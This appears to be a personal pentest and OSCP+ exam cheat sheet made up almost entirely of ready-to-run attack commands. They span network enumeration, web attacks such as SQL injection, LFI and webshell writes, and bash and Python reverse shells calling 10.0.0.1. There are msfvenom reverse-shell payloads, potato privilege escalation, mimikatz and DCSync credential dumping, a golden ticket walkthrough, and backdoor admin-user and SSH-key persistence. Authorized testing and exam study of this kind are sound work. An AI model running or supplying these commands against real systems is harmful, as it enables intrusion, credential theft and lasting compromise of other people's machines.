My personal reference built from real VAPT engagements and OSCP+ exam prep. Windows, Linux, Active Directory, Web — everything in one place. Last updated: 2026.
cd c:\Users tree /F
# Advanced full enumeration nmap -A [IP] -oN machine.txt # Fast all-ports (SYN + UDP) sudo nmap -p- -sS -sU --min-rate=1000 --max-retries=1 -T4 [IP] # Fast TCP only — skips host discovery nmap -p- -T4 -n -Pn [IP] -oN ports.txt # All ports greppable output sudo nmap --min-rate 5000 -p- -vvv -Pn -n -oG openPorts.txt [IP] # Service version scan on found ports nmap -sC -sV -p 22,80,445 [IP] -v # Run vuln scripts sudo nmap -sV -p 443 --script "vuln" [IP] # Use -Pn if getting nothing nmap -sC -sV [IP] -Pn
| Purpose | Command |
|---|---|
| UDP Scan | sudo nmap -sU -sS [IP] |
| OS Detection | nmap -O [IP] |
| Service Versions | nmap -sV [IP] |
| Top 20 ports | nmap --top-ports=20 [IP] |
| Network sweep | nmap -sn 192.168.1.0/24 |
ftp [IP] ftp anonymous@[IP] # Try anonymous login ftp -A anonymous@[IP] # Passive mode get [file] # Download put [file] # Upload hydra -L users.txt -P pass.txt [IP] ftp # Bruteforce
ssh user@IP ssh anonymous@IP chmod 600 id_rsa && ssh user@IP -i id_rsa # Crack id_rsa / id_ecdsa ssh2john id_rsa > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash # Bruteforce hydra -l user -P passwords.txt [IP] ssh # Add SSH public key for persistence ssh-keygen -t rsa -b 4096 chmod 700 ~/.ssh nano ~/.ssh/authorized_keys # paste id_rsa.pub content chmod 600 ~/.ssh/authorized_keys
# Enumerate sudo nbtscan -r 192.168.50.0/24 smbclient -L //IP smbmap -H [IP] smbmap -H [IP] -u user -p pass # Connect to share smbclient //server/share smbclient //server/share -U user smbclient \\\\192.168.1.1\\share # Download entire share at once mask "" recurse ON prompt OFF mget * # CrackMapExec crackmapexec smb [IP] -u user -p pass --shares crackmapexec smb [IP] -u user -p pass --users crackmapexec smb [IP] -u user -p pass --sam
host www.target.com
host -t mx target.com
host -t txt target.com
dnsrecon -d target.com -t std
dnsrecon -d target.com -D ~/list.txt -t brt
dnsenum target.com
# Subdomain fuzzing with ffuf
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt \
-H "Host: FUZZ.target.com" -u http://[IP] -fs [size]
# Unauthenticated ldapsearch -x -H ldap://[IP]:[port] # Authenticated ldapsearch -x -H ldap://[IP] -D 'DOMAIN\user' -w 'pass' \ -b "DC=domain,DC=local" # windapsearch python3 windapsearch.py --dc-ip [IP] -u user -p pass --computers python3 windapsearch.py --dc-ip [IP] -u user -p pass --users python3 windapsearch.py --dc-ip [IP] -u user -p pass --privileged-users
snmpwalk -c public -v1 [IP] snmpwalk -c public -v1 [IP] 1.3.6.1.4.1.77.1.2.25 # Windows users snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.25.4.2.1.2 # Running processes snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.25.6.3.1.2 # Installed software snmpwalk -c public -v1 [IP] 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpcheck -t [IP] -c public
rpcclient -U="" [IP] # Anonymous rpcclient -U=user [IP] # Inside rpcclient enumdomusers # List users enumdomgroups # List groups querydispinfo # User descriptions queryuser [user] # Detailed user info netshareenumall # All shares
/robots.txt, view page source, check for hostnames and add to /etc/hosts. Use Wappalyzer to fingerprint the CMS.gobuster dir -u http://target.com -w /path/to/wordlist.txt
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/big.txt -x php,txt,html
python3 dirsearch.py -u http://target.com
nikto -h http://target.com
# API endpoint fuzzing
gobuster dir -u http://[IP]:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern
# Basic traversal http://target.com/index.php?page=../../../../../etc/passwd # URL encoded curl http://[IP]/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd # LFI with log poisoning → RCE http://target.com/index.php?page=../../../var/log/apache2/access.log&cmd=whoami # PHP wrappers curl "http://target.com/index.php?page=data://text/plain," curl http://target.com/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/config.php # Windows traversal http://[IP]:3000/public/plugins/alertlist/../../../Users/install.txt
admin' or '1'='1
' or '1'='1' --
" or "1"="1"--
") or ("1"="1"--
# Time-based blind SQLi
' AND IF(1=1, sleep(3),'false') -- //
# MSSQL RCE via xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
# Write webshell via UNION
' UNION SELECT "",null,null INTO OUTFILE "/var/www/html/shell.php" -- //
sqlmap -u http://[IP]/page.php?user=1 -p user sqlmap -u http://[IP]/page.php?user=1 -p user --dump sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp"
wpscan --url "http://target" --enumerate vp,u,vt,tt --verbose wpscan --url http://target --api-token [YOUR_TOKEN]
hydra -l user -P rockyou.txt [IP] ssh hydra -l ajla -P /home/kali/rockyou.txt -T 20 sandbox.local ssh hydra -L users.txt -P pass.txt [IP] http-post-form \ "/login:user=^USER^&pass=^PASS^:Login failed" -V
searchsploit [service name]
searchsploit -m windows/remote/46697.py # Copy to current dir
# Windows EXE msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > shell.exe # PHP msfvenom -p php/reverse_php LHOST=[IP] LPORT=[PORT] -f raw > shell.php # ASP / JSP / WAR msfvenom -p windows/shell/reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f war > shell.war # DLL for hijacking msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f dll > file.dll # MSI (AlwaysInstallElevated) msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] --platform windows -f msi > reverse.msi
# Bash bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 # Python python -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' # PHP & /dev/tcp/10.0.0.1/4242 0>&1');?> # Shell upgrade after catching python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'
# Linux download wget http://[LHOST]/file curl http://[LHOST]/file -o output # Windows download (PowerShell) iwr -uri http://[LHOST]/file -Outfile file.exe certutil -urlcache -split -f "http://[LHOST]/file" file.exe powershell -command "Invoke-WebRequest -Uri http://[LHOST]/file -Outfile C:\temp\file" # SMB share (Kali → Windows) kali> impacket-smbserver -smb2support share . win> copy file \\[KaliIP]\share # SCP scp nmap pivot@10.1.1.10:/tmp # Netcat nc [target] 1234 < file # Attacker sends nc -lvp 1234 > file # Target receives # Unzip tar files in Kali tar -xvf file.tar tar -xzvf file.tar.gz tar -xjvf file.tar.bz2 tar -xJvf file.tar.xz tar -xvf file.tar -C /destination/
winpeas.exe first. Then whoami /all. Check PowerShell history: (Get-PSReadlineOption).HistorySavePathwhoami /groups whoami /all whoami /priv # Running services Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} # PowerShell history Get-History type C:\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt # Installed software Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname # Interesting files Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue # Find OSCP flag cd C:\ & findstr /SI /M "OS{" *.xml *.ini *.txt
winpeas.exe winpeas.bat Jaws-enum.ps1 powerup.ps1 PrivescCheck.ps1
# PrintSpoofer PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -c "nc.exe [LHOST] [LPORT] -e cmd" # GodPotato GodPotato.exe -cmd "cmd /c whoami" GodPotato.exe -cmd "shell.exe" # JuicyPotatoNG JuicyPotatoNG.exe -t * -p "shell.exe" -a # RoguePotato RoguePotato.exe -r [AttackerIP] -e "shell.exe" -l 9999
# Find unquoted service paths wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """ # Check permissions (F = Full Access) icacls "C:\path\to\service" # Change binary path sc config [service] binpath="C:\temp\shell.exe" sc start [service] # Weak registry permissions reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f net start [service]
# Check (should return 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] --platform windows -f msi > reverse.msi
msiexec /quiet /qn /i reverse.msi
# Check these paths C:\Windows\repair\SAM C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\SAM # Extract hashes impacket-secretsdump -system SYSTEM -sam SAM local
| Path | What to find |
|---|---|
| C:\Windows\Panther\Unattended.xml | Plaintext admin creds (auto-install) |
| C:\Windows\repair\SAM | Password hash backup |
| C:\Windows\System32\config\regback\* | Registry hive backups |
| C:\Program Files\FileZilla Server\FileZilla Server.xml | Plaintext FTP creds |
| C:\xampp\apache\bin\php.ini | Credentials, upload settings |
| C:\inetpub\wwwroot\global.asa | DB connection strings |
| C:\Windows\debug\NetSetup.log | Domain join credentials |
| C:\Windows\System32\drivers\etc\hosts | Custom DNS redirects |
# Save as OSCP-Windows-Enum.ps1 Set-ExecutionPolicy Bypass -Scope Process -Force .\OSCP-Windows-Enum.ps1 # Search for credential keywords in files $patterns = @("password","user","admin","token","apikey","secret", "[a-fA-F0-9]{32}","[a-fA-F0-9]{40}","[A-Za-z0-9+/=]{20,}") findstr /si password *.txt *.xml *.ini *.config findstr /spin "password" *.* # Registry credential search reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # KeePass files Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue keepass2john Database.kdbx > keepasshash john --wordlist=rockyou.txt keepasshash
net user hacker hacker123 /add net localgroup Administrators hacker /add net localgroup "Remote Desktop Users" hacker /ADD
xfreerdp /u:user /p:'pass' /v:IP
xfreerdp /d:domain.com /u:user /p:'pass' /v:IP
xfreerdp /u:user /p:'pass' /v:IP +clipboard
xfreerdp3 /v:IP /u:user /d:domain /p:'pass' /cert:ignore /multimon \ # /multimon = bigger screen
sudo -l find / -perm -u=s -type f 2>/dev/null # SUID binaries getcap -r / 2>/dev/null # Capabilities find / -writable -type d 2>/dev/null # Writable dirs cat /etc/crontab && crontab -l # Cron jobs cat /etc/fstab # Mounted drives cat .bashrc && env # Env variables / history # Live process credential harvesting watch -n 1 "ps -aux | grep pass" sudo tcpdump -i lo -A | grep "pass"
./linpeas.sh ./LinEnum.sh python3 linuxprivchecker.py
cat /etc/exports # On target — look for no_root_squash showmount -e [targetIP] # On attacker mount -o rw [targetIP]:/share /mnt/share # Copy binary, chmod +x, execute as root
Import-Module .\PowerView.ps1 Get-NetDomain Get-NetUser | select cn Get-NetGroup Get-NetComputer Find-LocalAdminAccess Get-NetSession -ComputerName [target] -Verbose Find-DomainShare # Kerberoastable accounts Get-NetUser -SPN | select samaccountname,serviceprincipalname # AS-REP Roastable Get-DomainUser -PreauthNotRequired -verbose # Check GenericAll rights Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights Convert-SidToName [SID]
# SharpHound (on Windows target) Import-Module .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp -OutputPrefix "audit" # bloodhound-python (from Kali) bloodhound-python -u 'user' -p 'pass' -ns [DC-IP] -d domain.local -c all # Start BloodHound sudo neo4j console # Upload the .json files in the BloodHound UI
# From Kali impacket-GetUserSPNs -dc-ip [DC-IP] domain/user:pass -request # From Windows .\Rubeus.exe kerberoast /outfile:hashes.kerberoast # Crack hashcat -m 13100 hashes.txt rockyou.txt --force
impacket-GetNPUsers -dc-ip [DC-IP] domain/user:pass -request .\Rubeus.exe asreproast /nowrap hashcat -m 18200 hashes.txt rockyou.txt --force
crackmapexec smb [IP/subnet] -u users.txt -p 'Password123' -d domain --continue-on-success
kerbrute passwordspray -d corp.com .\usernames.txt "Password123"
# Default passwords to always try
password / password1 / Password1 / Password@123
admin / administrator / admin@123
secretsdump.py domain/user:pass@IP
secretsdump.py user@IP -hashes lm:ntlm
secretsdump.py domain/user:pass@IP -just-dc-ntlm # Dump NTDS.dit
# Step 1: Get krbtgt hash lsadump::lsa /patch lsadump::dcsync /user:krbtgt # Step 2: Get domain SID whoami /user # Remove last part (RID) = domain SID # Step 3: Forge golden ticket kerberos::golden /user:admin /domain:corp.com /sid:[SID] /krbtgt:[HASH] /ticket:golden # Step 4: Use it kerberos::ptt golden misc::cmd
# Pass credentials or hashes — always use full hash psexec.py domain/user:pass@IP psexec.py -hashes aad3b435b51404ee:5fbc3d5fec8206a3 domain/user@IP wmiexec.py domain/user:pass@IP smbexec.py domain/user:pass@IP # winrs (Windows) winrs -r:[target] -u:user -p:pass "cmd" # Pass the ticket sekurlsa::tickets /export kerberos::ptt [ticket.kirbi] klist
privilege::debug token::elevate sekurlsa::logonpasswords # Hashes + plaintext passwords lsadump::sam lsadump::dcsync /user:krbtgt lsadump::lsa /patch # One-liner .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
impacket-smbclient domain/user:pass@IP impacket-lookupsid domain/user:pass@IP impacket-secretsdump domain/user:pass@IP impacket-GetUserSPNs domain/user:pass@IP -dc-ip [DC] -request # Kerberoasting impacket-GetNPUsers domain/ -dc-ip [DC] -usersfile users.txt -format hashcat # AS-REP impacket-psexec domain/user:pass@IP impacket-wmiexec domain/user:pass@IP impacket-mssqlclient user:pass@IP -windows-auth
# Setup on Kali sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ./proxy -laddr 0.0.0.0:9001 -selfcert # On compromised machine agent.exe -connect [KaliIP]:9001 -ignore-cert # In Ligolo console session # Select host ifconfig # Note internal subnet start # Add route on Kali sudo ip r add [subnet] dev ligolo
# If .git found on target web server git log git show [commit-id] # Dump entire git repo # Use: https://github.com/arthaud/git-dumper # KDBX (KeePass) files find / -name *.kdbx 2>/dev/null # Linux Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue # Windows
It took years of real engagements to build these notes. A coffee keeps me adding more.
☕ Buy me a coffee